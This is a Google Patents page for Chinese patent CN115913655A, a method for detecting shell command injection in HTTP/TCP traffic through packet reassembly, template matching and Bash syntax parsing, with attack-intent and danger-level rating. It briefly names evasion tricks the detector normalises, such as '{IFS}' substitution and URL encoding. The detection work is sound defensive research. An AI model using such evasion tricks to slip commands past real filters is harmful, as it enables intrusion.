CN115913655A - Shell command injection detection method based on flow analysis and semantic analysis - Google Patents
Shell command injection detection method based on flow analysis and semantic analysis Download PDFInfo
- Publication number
- CN115913655A CN115913655A CN202211337335.3A CN202211337335A CN115913655A CN 115913655 A CN115913655 A CN 115913655A CN 202211337335 A CN202211337335 A CN 202211337335A CN 115913655 A CN115913655 A CN 115913655A
- Authority
- CN
- China
- Prior art keywords
- shell command
- analysis
- shell
- plaintext data
- command
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Granted
Links
- 238000004458 analytical method Methods 0.000 title claims abstract description 91
- 238000001514 detection method Methods 0.000 title claims abstract description 38
- 238000002347 injection Methods 0.000 title claims abstract description 33
- 239000007924 injection Substances 0.000 title claims abstract description 33
- 238000005206 flow analysis Methods 0.000 title claims abstract description 9
- 238000000034 method Methods 0.000 claims description 25
- 238000001914 filtration Methods 0.000 claims description 12
- 238000012545 processing Methods 0.000 claims description 11
- 238000004590 computer program Methods 0.000 claims description 7
- 230000007246 mechanism Effects 0.000 claims description 5
- 238000011084 recovery Methods 0.000 claims description 5
- 230000007704 transition Effects 0.000 claims description 4
- 238000004891 communication Methods 0.000 abstract description 2
- 230000006870 function Effects 0.000 description 13
- 230000004048 modification Effects 0.000 description 4
- 238000012986 modification Methods 0.000 description 4
- 238000005516 engineering process Methods 0.000 description 3
- 238000007781 pre-processing Methods 0.000 description 3
- 238000005215 recombination Methods 0.000 description 3
- 230000006798 recombination Effects 0.000 description 3
- 230000011218 segmentation Effects 0.000 description 3
- 239000000243 solution Substances 0.000 description 3
- 241000283726 Bison Species 0.000 description 2
- 230000007547 defect Effects 0.000 description 2
- 238000010586 diagram Methods 0.000 description 2
- 238000000605 extraction Methods 0.000 description 2
- 230000006872 improvement Effects 0.000 description 2
- 230000002452 interceptive effect Effects 0.000 description 2
- 230000002159 abnormal effect Effects 0.000 description 1
- 230000009286 beneficial effect Effects 0.000 description 1
- 238000013075 data extraction Methods 0.000 description 1
- 230000007123 defense Effects 0.000 description 1
- 230000008569 process Effects 0.000 description 1
- 230000035945 sensitivity Effects 0.000 description 1
- 238000006467 substitution reaction Methods 0.000 description 1
Images
Classifications
-
- Y—GENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
- Y02—TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
- Y02D—CLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
- Y02D30/00—Reducing energy consumption in communication networks
- Y02D30/50—Reducing energy consumption in communication networks in wire-line communication networks, e.g. low power modes or reduced link rate
Landscapes
- Data Exchanges In Wide-Area Networks (AREA)
- Computer And Data Communications (AREA)
Abstract
The invention belongs to the field of network communication, and particularly relates to a Shell command injection detection method based on flow analysis and semantic analysis, which comprises the following steps: collecting high-speed network flow at a network interface, and restoring the high-speed network flow into a complete HTTP or TCP network session data flow; deep packet analysis is carried out on the network session data stream to obtain Payload plaintext data of HTTP or TCP; matching the occurrence position of the Shell command in the Payload plaintext data by adopting a Shell command template library; performing lexical analysis and syntactic analysis on Payload plaintext data at the position of occurrence to generate an abstract syntax tree of the Shell command, wherein each node corresponds to command information of one Shell command; and traversing and detecting each node in the abstract syntax tree, identifying all nodes matched with the templates in the Shell command template library, taking each Shell command corresponding to all the nodes as the Shell command in Payload plaintext data, and finishing the injection detection of the Shell command. The invention greatly improves the detection precision by a semantic analysis mode.
Description
Technical Field
The invention belongs to the field of network communication, and particularly relates to a Shell command injection detection method based on flow analysis and semantic analysis.
Background
Shell command injection is a common attack means of network attack, and an attacker causes a target application to execute a specified Shell command by sending a specific data packet to a certain service with defects so as to cause the command to be executed. Generally speaking, a normal HTTP packet should not include a Shell command, so that a packet including a Shell command, such as download execution, right modification, device sensitivity information acquisition, and the like, may be determined to be abnormal.
For the injection of the Shell command, the current main detection and defense means is to discover and intercept gateway traffic, client traffic or user mode data in a mode of Shell keyword filtering and rule matching. However, in this method, firstly, only the character string meeting the rule can be matched, but the Shell command grammar contained in the character string cannot be guaranteed to be correct, so the false alarm rate is high; secondly, the regular expression is difficult to compile aiming at the command character string, so that the accurate Shell command content is difficult to extract; thirdly, only a single Shell command can be matched, a complete Shell command sequence cannot be accurately extracted, and the Shell command sequence has no overall intention analysis.
Therefore, further improving the accuracy of the Shell command injection detection is a problem that needs to be solved in the field.
Disclosure of Invention
Aiming at the defects and improvement requirements of the prior art, the invention provides a Shell command injection detection method based on flow analysis and semantic analysis, aiming at accurately identifying the Shell command injection in a network flow HTTP/TCP data packet so as to reduce the probability of false alarm and false alarm.
To achieve the above object, according to an aspect of the present invention, there is provided a Shell command injection detection method based on traffic analysis and semantic analysis, including:
collecting high-speed network flow at a network interface, and restoring network flow dispersed in each time domain in the collected network flow data into complete HTTP or TCP network session data flow; deep packet analysis is carried out on the network session data stream to obtain Payload plaintext data of HTTP or TCP;
matching the occurrence position of the Shell command in the Payload plaintext data by adopting a Shell command template library; performing lexical analysis and syntactic analysis on Payload plaintext data at the appearance position to generate an abstract syntax tree of the Shell command, wherein each node corresponds to command information of the Shell command;
and traversing and detecting each node in the abstract syntax tree, identifying all nodes matched with the templates in the Shell command template library, taking each Shell command corresponding to all the nodes as the Shell command in Payload plaintext data, and finishing the injection detection of the Shell command.
Further, the method also comprises the following steps: and determining the attack intention of each Shell command in Payload plaintext data based on the node information.
Further, still include:
and determining the danger level of the Shell command corresponding to all the identified nodes from the Shell command template library.
Further, when performing traversal detection on each node in the abstract syntax tree, the method further includes: and determining the danger level of the abstract syntax tree by adopting an attack state transition recognition method.
Further, the method also comprises the following steps: and storing the Payload plaintext data into a MongoDB database.
Further, before matching the occurrence position of the Shell command in the Payload plaintext data, the method further includes:
filtering and processing noise characters in the Payload plaintext data: carrying out URL decoding on Payload plaintext data; and carrying out filtering replacement on special characters in Payload plaintext data and special marks in BASH grammar.
Further, the Shell command detected from the Payload plaintext data, the attack intention, the danger level information and the occurrence position information are stored in a database for query.
Further, the grammar generator with the fault-tolerant mechanism is adopted to execute the grammar analysis, wherein the grammar generator contains error recovery rules;
then when parsing the Payload plaintext data, a multi-AST abstract syntax tree is generated, containing all Shell commands in the Payload plaintext data.
The invention also provides a computer readable storage medium, which comprises a stored computer program, wherein when the computer program is executed by a processor, the device on which the storage medium is located is controlled to execute the Shell command injection detection method based on traffic analysis and semantic analysis.
Generally, by the above technical solution conceived by the present invention, the following beneficial effects can be obtained:
(1) The invention provides a method for discovering, positioning and extracting Shell attack sentences based on flow analysis and semantic analysis aiming at Shell command injection attacks in network flow.
(2) The method can also analyze attack intention and danger level of the extracted Shell command, and analyze the danger level of the whole abstract syntax tree to obtain multidimensional Shell command injection information, thereby realizing multi-angle analysis of Shell command injection.
(3) The invention provides a fault-tolerant mechanism which is introduced when an abstract syntax tree is constructed through lexical analysis and syntax analysis, so that the problem that detection reliability is influenced due to incomplete traversal caused by stopping traversing subsequent Shell commands when errors occur is solved.
Drawings
Fig. 1 is a flow chart of a Shell command injection detection method based on traffic analysis and semantic analysis according to an embodiment of the present invention;
fig. 2 is a state transition diagram of an attack statement based on an abstract syntax tree in semantic analysis according to an embodiment of the present invention;
fig. 3 is a flow chart of another Shell command injection detection method according to an embodiment of the present invention;
fig. 4 is a block diagram of a structure of a Shell command injection detection system based on traffic analysis and semantic analysis according to an embodiment of the present invention.
Detailed Description
In order to make the objects, technical solutions and advantages of the present invention more apparent, the present invention is further described in detail below with reference to the accompanying drawings and embodiments. It should be understood that the specific embodiments described herein are merely illustrative of the invention and are not intended to limit the invention. In addition, the technical features involved in the embodiments of the present invention described below may be combined with each other as long as they do not conflict with each other.
Example one
A method for detecting Shell command injection based on traffic analysis and semantic analysis, as shown in fig. 1, includes:
collecting high-speed network flow at a network interface, and restoring network flow dispersed in each time domain in the collected network flow data into complete HTTP or TCP network session data flow; deep packet analysis is carried out on the network session data stream to obtain Payload plaintext data of HTTP or TCP;
matching the occurrence position of the Shell command in Payload plaintext data by adopting a Shell command template library; performing lexical analysis and syntactic analysis on Payload plaintext data at the occurrence position to generate an abstract syntax tree of the Shell command, wherein each node corresponds to command information of the Shell command;
and traversing and detecting each node in the abstract syntax tree, identifying all nodes matched with the templates in the Shell command template library, taking each Shell command corresponding to all the nodes as the Shell command in Payload plaintext data, and finishing the injection detection of the Shell command.
In the method, whether the Shell command is injected and a specific Shell command statement are analyzed from the flow data in a semantic analysis mode, so that the detection precision is greatly improved.
Preferably, the method further comprises: and determining the attack intention of each Shell command in Payload plaintext data based on the node information.
Preferably, the method further comprises: and determining the danger level of the Shell command corresponding to all the identified nodes from the Shell command template library.
Preferably, when performing traversal detection on each node in the abstract syntax tree, the method further includes: the risk level of the abstract syntax tree is determined by adopting an attack state transition recognition method, as shown in fig. 2.
That is, the basic flow of the Shell command injection detection method based on the flow analysis and the semantic analysis is as follows: firstly, flow acquisition and Data packet recombination are carried out, the DPDK technology can be used for acquiring the Flow flowing through a network card, the Data packet recombination is carried out on TCP Data in the Flow, and complete TCP Flow Data is restored; then, deep packet analysis is carried out on the flow data packet, TCP Payload and HTTP Payload plaintext information in HTTP/TCP are extracted and stored in a database; and finally, carrying out analysis operations such as Shell command detection, attack statement extraction, semantic recognition, attack intention recognition and the like on the acquired plaintext flow information.
Specifically, as shown in fig. 3, (1) network traffic collection: adopting a DPDK flow collection algorithm to collect high-speed network flow at a network interface, and collecting network flow data suspected of containing a Shell command as original flow; and (2) restoring the network session data stream: network Flow which is dispersed in each time domain in the original Flow is restored into complete HTTP/TCP network session data Flow (used for Payload plaintext data extraction) by adopting a TCP Flow recombination method; (3) Payload plaintext data: according to a standard network protocol format, deep packet analysis (DPI) is carried out on the network session data flow, payload plaintext data of HTTP/TCP load is analyzed, and the Payload plaintext data is stored in a MongoDB database according to a protocol field; (4) positioning based on the Shell attack command of the regular matching: constructing a Shell command template library, and matching the occurrence position of the Shell command in Payload plaintext data; (5) Shell command syntax/lexical analysis based on BASH syntax: according to the occurrence position, performing Shell attack statement extraction on Payload plaintext data; and the lexical analysis uses a Flex tool, and carries out word reading and word segmentation on the input character string and returns keywords, operational characters, common words and the like. The grammar analysis adopts a grammar generator to automatically generate a tool Bison, and the tool adopts a bottom-up LALR analysis technology to analyze the words which are extracted by the lexical analysis and meet the conditions to complete the grammar analysis; (6) Traversing and detecting each node in the abstract syntax tree to realize the analysis of Shell command semantics and attack intention; (7) And outputting the Shell attack statement, the attack intention, the danger rating result and the attack statement position to a database for storage for inquiry.
Preferably, the method further comprises the following steps: and storing the Payload plaintext data into a MongoDB database so as to perform command injection analysis detection again in the following process.
Preferably, before matching the occurrence position of the Shell command in the Payload plaintext data, the method further includes: filtering and processing a large number of noise characters existing in the extracted HTTP/TCP plaintext Payload, wherein the processing comprises the following steps: and carrying out URL decoding on Payload plaintext data, and carrying out filtering replacement on special characters in the Payload plaintext data and special marks in BASH grammar.
Preferably, an improved syntax generator automated generation tool Bison with a fault tolerance mechanism is adopted to execute the syntax analysis, and then when the Payload plaintext data is subjected to the syntax analysis, a plurality of AST abstract syntax trees are generated and include all Shell commands in the Payload plaintext data, so that the detection precision is further improved, and the problem of missing report is avoided.
In the embodiment, the syntax analysis implementation depends on a syntax analysis module of the BASH open source code, and firstly, more fault-tolerant processing is added, error recovery rules are added, and a more robust abstract syntax tree is ensured to be generated; and secondly, the problem of memory leakage existing in the syntax analysis error recovery stage is solved.
Overall, the embodiment adopts a syntax semantic analysis method, so that the shell command is ensured to conform to syntax, the false alarm rate can be reduced, the analysis dimensionality can be improved by performing semantic analysis, the information injected by the shell can be obtained from multiple angles, and the problem of low accuracy in shell injection in the existing detection and interception of network traffic is solved.
To better illustrate the present invention, a detection system is provided, as shown in fig. 4, which includes a network data collecting and processing unit 100, a preprocessing unit 200, a syntax/lexical analysis unit 300, and a semantic and attack intention output unit 400, which are sequentially interactive.
The working mechanism is as follows: the network data acquisition and processing unit 100 collects network traffic data which may contain the Shell command, and stores the plaintext Payload data into the database 130 after the network traffic data is analyzed by the data packet analysis module 120; the preprocessing unit 200 reads HTTP/TCP plaintext data from the database 130 to the URL decoding module 210 for URL decoding, then inputs the result to the noise character filtering module 220 to filter out special characters, the Shell command positioning module 240 receives the inputs of the Shell command configuration module 230 and the noise character filtering module 220, and outputs a character string to be semantically analyzed to the syntax/lexical analysis unit 300; the syntax analysis module 310 invokes the lexical analysis module 320 to perform word segmentation on the input character strings to generate tokens, and finally generates an abstract syntax tree, which is input to the semantic and attack intention output unit 400; the semantic analysis module 420 performs syntax tree traversal using the abstract syntax tree, and the attack intention analysis module 410 performs intention determination on the attack sentence, generates a danger level, and generates an output file 430.
Specifically, the network data collecting and processing unit 100 includes a network traffic collecting module 110, a data packet parsing module 120, and a database 130, which are sequentially interactive.
The network traffic collection module 110 refers to any hardware or software capable of collecting network traffic, such as a router, a switch, a hub, or network data collection software, which functions to collect network traffic. The module uses DPDK flow collection technology to realize the collection of high-speed network flow at a network interface, collects network flow data possibly containing Shell commands and provides the data to the data packet analysis module for analysis. The packet parsing module 120 is a program capable of parsing HTTP/TCP protocol packets, and has a function of performing TCP Flow reassembly on the collected Flow Data, then performing deep packet parsing (DPI) on the reassembled and restored TCP Flow Data according to a standard network protocol format, parsing Payload plaintext Data of the HTTP/TCP load and outputting the parsed plaintext Data to a database, and providing the Data to the Shell command semantic syntax parsing module for detection processing. The database 130 is a database for storing Payload plaintext data analyzed from HTTP/TCP load, and is generally a MongoDB database, and functions to store the plaintext contents of the analyzed data packet.
The preprocessing unit 200 includes a URL decoding module 210, a noise character filtering module 220, a Shell command configuration module 230, and a Shell command location module 240.
The URL decoding module 210 refers to a program for URL decoding of a character string, and functions to URL decode an input character string, for example, "%20", which functions to prevent the Shell command embedded in the URL from being bypassed by encoding. The special string replacement module 220 is a program for filtering and replacing some special characters in Payload and some special marks in the BASH syntax, and functions to replace special substrings in the input string, such as "{ IFS }" environment variables and "+" in URL. The Shell command configuration file 230 refers to a file for configuring Shell commands, and the function of the file is to configure Shell commands which need semantic analysis besides common download execution and modification rights. The Shell command positioning module 240 is a program for performing regular matching, and has a function of performing regular matching on input data according to the Shell command configuration module 230 and Shell command keywords in the BASH syntax, and matching the occurrence positions of Shell commands in HTTP/TCP Payload that need to perform semantic analysis, so as to reduce the scope and overhead of the semantic analysis.
The syntax/lexical analysis unit 300 includes two modules cooperating with each other, a syntax analysis module 310 and a lexical analysis module 320. The parsing module 310 is a program for parsing an input string, and functions to parse the string according to the syntax rule of the Shell command to generate an abstract syntax tree, and the parsing module 310 needs to call the lexical analysis module 320 to perform word segmentation. The lexical analysis module 320 is a program for segmenting input character strings, and functions to receive calls from the syntax analysis module 310, input the current character string, output words meeting lexical rules, and return the words to the syntax analysis module 310.
The semantic analysis and output unit 400 includes an attack intention analysis module 410, a semantic analysis module 420, and an output module 430.
The attack intention analysis module 410 refers to a program for analyzing the attack intention. The function is to use an attack command template library to perform malicious attack command matching on the extracted attack command, and identify the attack intention of the extracted attack command by combining the attack command identified by the semantic analysis module 420. The semantic module 420 refers to a program for performing semantic analysis. The function of the method is to traverse the abstract syntax tree generated by the syntax analysis module 310 and identify attack commands, and the attack modes to be identified comprise Shell attack commands such as download execution, permission modification, configuration file configuration and the like. The output module 430 refers to a database for storing analysis results, and functions to store the results of semantic and attack intention analysis, including Shell attack statements, attack intentions, danger rating results, and attack statement positions, and output the results to the database for storage for query.
In conclusion, the embodiment provides a method for discovering, positioning and extracting the Shell attack statement and recognizing the attack intention semantically based on flow analysis and semantic analysis, the method has certain input fault tolerance capability, error recovery processing is added by syntactic analysis, and the wrong Shell commands which do not accord with Shell grammar rules are eliminated. The detection system can be realized by using C language, occupies less memory and has higher operation efficiency.
Example two
A computer readable storage medium comprising a stored computer program, wherein when the computer program is executed by a processor, the storage medium controls a device on which the storage medium is located to execute a Shell command injection detection method based on traffic analysis and semantic analysis as described above.
The related technical solution is the same as the first embodiment, and is not described herein again.
It will be understood by those skilled in the art that the foregoing is only an exemplary embodiment of the present invention, and is not intended to limit the invention to the particular forms disclosed, since various modifications, substitutions and improvements within the spirit and scope of the invention are possible and within the scope of the appended claims.
Claims (8)
1. A Shell command injection detection method based on flow analysis and semantic analysis is characterized by comprising the following steps:
collecting high-speed network flow at a network interface, and restoring network flow dispersed in each time domain in the collected network flow data into complete HTTP or TCP network session data flow; deep packet analysis is carried out on the network session data stream to obtain Payload plaintext data of HTTP or TCP;
matching the occurrence positions of all Shell commands in the Payload plaintext data by adopting a Shell command template library; performing lexical analysis and syntactic analysis on Payload plaintext data at the position of occurrence to generate an abstract syntax tree of the Shell command, wherein each node corresponds to command information of one Shell command;
and traversing and detecting each node in the abstract syntax tree, identifying all nodes matched with the templates in the Shell command template library, taking each Shell command corresponding to all the nodes as the Shell command in Payload plaintext data, and finishing the injection detection of the Shell command.
2. The Shell command injection detection method of claim 1, further comprising: and determining the attack intention of each Shell command in Payload plaintext data based on the node information.
3. The Shell command injection detection method of claim 1, further comprising:
and determining the danger levels of the Shell commands corresponding to all the identified nodes from the Shell command template library.
4. The Shell command injection detection method of claim 1, wherein, in performing traversal detection on each node in the abstract syntax tree, the method further comprises: and determining the danger level of the abstract syntax tree by adopting an attack state transition recognition method.
5. The method according to claim 1, wherein before matching the occurrence location of the Shell command in the Payload plaintext data, the method further comprises:
filtering and processing noise characters in the Payload plaintext data, wherein the filtering and processing comprises the following steps: carrying out URL decoding on Payload plaintext data; and carrying out filtering replacement on special characters in Payload plaintext data and special marks in BASH grammar.
6. The Shell command injection detection method of claim 1, further comprising: and storing the Shell command detected from the Payload plaintext data, the attack intention, the danger level information and the occurrence position information thereof into a database for query.
7. The Shell command injection detection method of any of claims 1 to 6, wherein the parsing is performed using a modified grammar generator with fault tolerance mechanism, wherein the grammar generator contains error recovery rules;
when the Payload plaintext data is parsed, a plurality of AST abstract syntax trees are generated, including all Shell commands in the Payload plaintext data.
8. A computer-readable storage medium, comprising a stored computer program, wherein when the computer program is executed by a processor, the computer program controls a device on which the storage medium is located to execute a Shell command injection detection method based on traffic analysis and semantic analysis according to any one of claims 1 to 7.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202211337335.3A CN115913655B (en) | 2022-10-28 | 2022-10-28 | Shell command injection detection method based on flow analysis and semantic analysis |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202211337335.3A CN115913655B (en) | 2022-10-28 | 2022-10-28 | Shell command injection detection method based on flow analysis and semantic analysis |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN115913655A true CN115913655A (en) | 2023-04-04 |
| CN115913655B CN115913655B (en) | 2024-05-14 |
Family
ID=86490262
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202211337335.3A Active CN115913655B (en) | 2022-10-28 | 2022-10-28 | Shell command injection detection method based on flow analysis and semantic analysis |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN115913655B (en) |
Cited By (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN116663019A (en) * | 2023-07-06 | 2023-08-29 | 华中科技大学 | Source code vulnerability detection method, device and system |
Citations (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101482847A (en) * | 2009-01-19 | 2009-07-15 | 北京邮电大学 | Detection method based on safety bug defect mode |
| CN104836702A (en) * | 2015-05-06 | 2015-08-12 | 华中科技大学 | Host network abnormal behavior detection and classification method under large flow environment |
| WO2018041114A1 (en) * | 2016-08-30 | 2018-03-08 | 北京长亭科技有限公司 | Method and apparatus for detecting network attack, terminal device, and computer storage medium |
| CN112887274A (en) * | 2021-01-12 | 2021-06-01 | 恒安嘉新(北京)科技股份公司 | Method and device for detecting command injection attack, computer equipment and storage medium |
-
2022
- 2022-10-28 CN CN202211337335.3A patent/CN115913655B/en active Active
Patent Citations (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101482847A (en) * | 2009-01-19 | 2009-07-15 | 北京邮电大学 | Detection method based on safety bug defect mode |
| CN104836702A (en) * | 2015-05-06 | 2015-08-12 | 华中科技大学 | Host network abnormal behavior detection and classification method under large flow environment |
| WO2018041114A1 (en) * | 2016-08-30 | 2018-03-08 | 北京长亭科技有限公司 | Method and apparatus for detecting network attack, terminal device, and computer storage medium |
| CN112887274A (en) * | 2021-01-12 | 2021-06-01 | 恒安嘉新(北京)科技股份公司 | Method and device for detecting command injection attack, computer equipment and storage medium |
Non-Patent Citations (4)
| Title |
|---|
| "结合协议状态分析的入侵检测模型研究", 计算机与数字工程, no. 12, 20 December 2006 (2006-12-20) * |
| LANSHENG HAN: "An Optimized Static Propositional Function Model to Detect Software Vulnerability", 《IEEE ACCESS 》, 26 September 2019 (2019-09-26) * |
| 张昊;: "基于语义分析和神经网络的WebShell检测方法", 网络空间安全, no. 02, 25 February 2019 (2019-02-25) * |
| 韩兰胜: "软件漏洞静态检测模型及检测框架", 《 计算机科学》, 15 May 2016 (2016-05-15) * |
Cited By (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN116663019A (en) * | 2023-07-06 | 2023-08-29 | 华中科技大学 | Source code vulnerability detection method, device and system |
| CN116663019B (en) * | 2023-07-06 | 2023-10-24 | 华中科技大学 | Source code vulnerability detection method, device and system |
Also Published As
| Publication number | Publication date |
|---|---|
| CN115913655B (en) | 2024-05-14 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN105706045B (en) | Semantic-Oriented analysis to log information content | |
| US20040205411A1 (en) | Method of detecting malicious scripts using code insertion technique | |
| CN113645224B (en) | Network attack detection method, device, equipment and storage medium | |
| Meiners et al. | Flowsifter: A counting automata approach to layer 7 field extraction for deep flow inspection | |
| CN115913655B (en) | Shell command injection detection method based on flow analysis and semantic analysis | |
| Huang et al. | Protocol reverse-engineering methods and tools: A survey | |
| CN115396147A (en) | APT (active Power Table) detection method fusing cloud network end log and threat knowledge | |
| US9600644B2 (en) | Method, a computer program and apparatus for analyzing symbols in a computer | |
| Chida et al. | Repairing dos vulnerability of real-world regexes | |
| Chandler et al. | BinaryInferno: A Semantic-Driven Approach to Field Inference for Binary Message Formats. | |
| CN114036526A (en) | Vulnerability testing method and device, computer equipment and storage medium | |
| CN111581057B (en) | General log analysis method, terminal device and storage medium | |
| CN113127862B (en) | XXE attack detection method and device, electronic equipment and storage medium | |
| CN115150483B (en) | Network data packet analysis method, system and readable storage medium | |
| CN111753295B (en) | Vulnerability exploitation program detection method based on vulnerability exploitation program characteristics | |
| CN112632109A (en) | Information extraction method and device, electronic equipment and readable storage medium | |
| CN113139183B (en) | Detection method, detection device, detection equipment and storage medium | |
| CN115587364B (en) | Firmware vulnerability input point positioning method and device based on front-end and back-end correlation analysis | |
| CN114595148B (en) | Java null pointer reference detection method and system based on data stream propagation analysis | |
| CN113489622B (en) | Method, system, equipment and storage medium for extracting network equipment fingerprint | |
| Yan et al. | Nafuzzer: Augmenting network protocol fuzzers via automatic template and seed generation | |
| CN114443685A (en) | SQL injection detection method and device | |
| CN116361783A (en) | Threat detection method, threat detection device, electronic equipment and storage medium | |
| CN115529167A (en) | Protocol inconsistency vulnerability mining method and device based on man-machine cooperation | |
| CN116432176A (en) | Web malicious program detection method and system based on cross-language semantic analysis |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |